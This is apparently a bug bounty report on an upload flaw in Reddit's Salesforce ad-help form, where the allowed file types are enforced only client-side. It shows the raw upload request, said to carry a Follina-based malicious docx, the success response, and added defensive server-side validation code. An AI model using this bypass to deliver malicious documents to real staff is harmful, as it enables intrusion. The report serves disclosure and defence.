Reddit: Unrestricted File Upload on reddit.secure.force.com
Description

## Summary:
Reddit.secure.force.com is Reddit's Salesforce instance. An attacker is able to send attachments of disallowed file types to this server, including malicious documents such as CVE-2022-30190 (Follina) files, to the victim who handles the form.

## Impact:
An attacker can send malicious files to whoever handles the form behind https://reddit.secure.force.com/adhelp

## Steps To Reproduce:
1. Go to https://reddit.secure.force.com/adhelp
2. Notice that the allowed file types are listed as jpg, jpeg, gif, png and pdf, as the image below shows:

{F1780944}

3. If you try dragging and dropping a docx file onto that box, client-side JavaScript forbids the action. But if you use the "Click to browse" option, you can upload the file anyway.

{F1780957}

4. The file upload request:

```http
POST /adhelp/apexremote HTTP/1.1
Host: reddit.secure.force.com
????????
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://reddit.secure.force.com/adhelp/
X-User-Agent: Visualforce-Remoting
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 15301
Origin: https://reddit.secure.force.com
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

{"action":"AdvertisingHelpController","method":"uploadFile","data":["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","","Dummy Data.docx","5005c000017FCu8AAG","118.70.7.113"],"type":"rpc","tid":3,"ctx":{"csrf":"VmpFPSxNakF5TWkwd05pMHlNMVF3T0Rvek1qb3lOQzQ0TURCYSxPeVQ1SlZBcnRoajJZQlJFS1c3QVlvLE5HVXhPRGN6","vid":"0661J000003FS4V","ns":"","ver":41}}
```

Here the data parameter contains the base64-encoded version of my clickme.docx file, which is based on the critical Follina vulnerability {F1780963}. This vulnerability can become a [zero-click exploit](https://innovatecybersecurity.com/security-threat-advisory/follina-zero-day-allows-zero-click-rce-from-office-docs/).

5. The response returns 200, indicating that there is no server-side check of the file type and that the file was uploaded successfully:
```http
HTTP/1.1 200 OK
Date: Mon, 20 Jun 2022 08:41:53 GMT
Strict-Transport-Security: max-age=63072000; includeSubDomains
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Referrer-Policy: origin-when-cross-origin
Cache-Control: no-cache,must-revalidate,max-age=0,no-store,private
Content-Type: application/json;charset=UTF-8
X-Powered-By: Salesforce.com Visualforce
Vary: Accept-Encoding
Connection: close
Content-Length: 142

[{"statusCode":200,"type":"rpc","tid":3,"ref":false,"action":"AdvertisingHelpController","method":"uploadFile","result":"00P5c00001leROKEA2"}]
```
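The root cause in steps 3 to 5 is that the file-type allowlist is enforced only in the browser. The following is an added example (not code from the report or from Salesforce) of the server-side check that should sit behind an `uploadFile` handler: it validates both the extension against the advertised allowlist and the leading bytes of the decoded content, so a docx renamed to `.png` is rejected as well as a docx sent as-is. The layout of the `data` array (`[base64_content, "", filename, parent_id, client_ip]`) is an assumption taken from the order seen in the request above; the sample bytes are constructed.

```python
import base64
import json
import os

# The allowlist the form advertises (jpg jpeg gif png pdf); the server must enforce it too.
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "gif", "png", "pdf"}

# Leading bytes ("magic numbers") each allowed format starts with, so a renamed file is caught.
MAGIC = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
    "pdf": (b"%PDF-",),
}


def check_upload(filename: str, data: bytes) -> tuple[bool, str]:
    """Return (accepted, reason). Extension and content must both match the allowlist."""
    ext = os.path.splitext(filename)[1].lstrip(".").lower()
    if ext not in ALLOWED_EXTENSIONS:
        return False, f"extension .{ext or '<none>'} not allowed"
    if not any(data.startswith(sig) for sig in MAGIC[ext]):
        return False, f"content does not look like {ext}"
    return True, "ok"


def check_remoting_request(body: str) -> tuple[bool, str]:
    """Validate a Visualforce-Remoting style uploadFile call before storing anything.

    Assumed (hypothetical, not Salesforce's API) layout of "data":
    [base64_content, "", filename, parent_id, client_ip].
    """
    req = json.loads(body)
    if req.get("action") != "AdvertisingHelpController" or req.get("method") != "uploadFile":
        return False, "not an uploadFile call"
    data = req.get("data", [])
    if len(data) < 3:
        return False, "malformed data array"
    try:
        content = base64.b64decode(data[0], validate=True)
    except ValueError:
        return False, "payload is not valid base64"
    return check_upload(data[2], content)


def make_body(filename: str, content: bytes) -> str:
    """Build a request body in the same shape as the report's request (constructed sample)."""
    data = [base64.b64encode(content).decode("ascii"), "", filename, "PARENT-ID-PLACEHOLDER", "192.0.2.1"]
    return json.dumps({"action": "AdvertisingHelpController", "method": "uploadFile",
                       "data": data, "type": "rpc", "tid": 3})


# Constructed sample contents: a minimal PNG header and a ZIP local-file header (docx is a ZIP).
PNG_SAMPLE = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
DOCX_SAMPLE = b"PK\x03\x04" + b"\x00" * 16

if __name__ == "__main__":
    for name, content in [("photo.png", PNG_SAMPLE),
                          ("Dummy Data.docx", DOCX_SAMPLE),
                          ("Dummy Data.png", DOCX_SAMPLE)]:
        print(name, check_remoting_request(make_body(name, content)))
```

Running the block shows `photo.png` accepted, `Dummy Data.docx` rejected on extension, and `Dummy Data.png` (docx content behind an allowed extension) rejected on content. Logging the rejection reason alongside the submitting client gives the support team a simple detection signal for repeated attempts.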
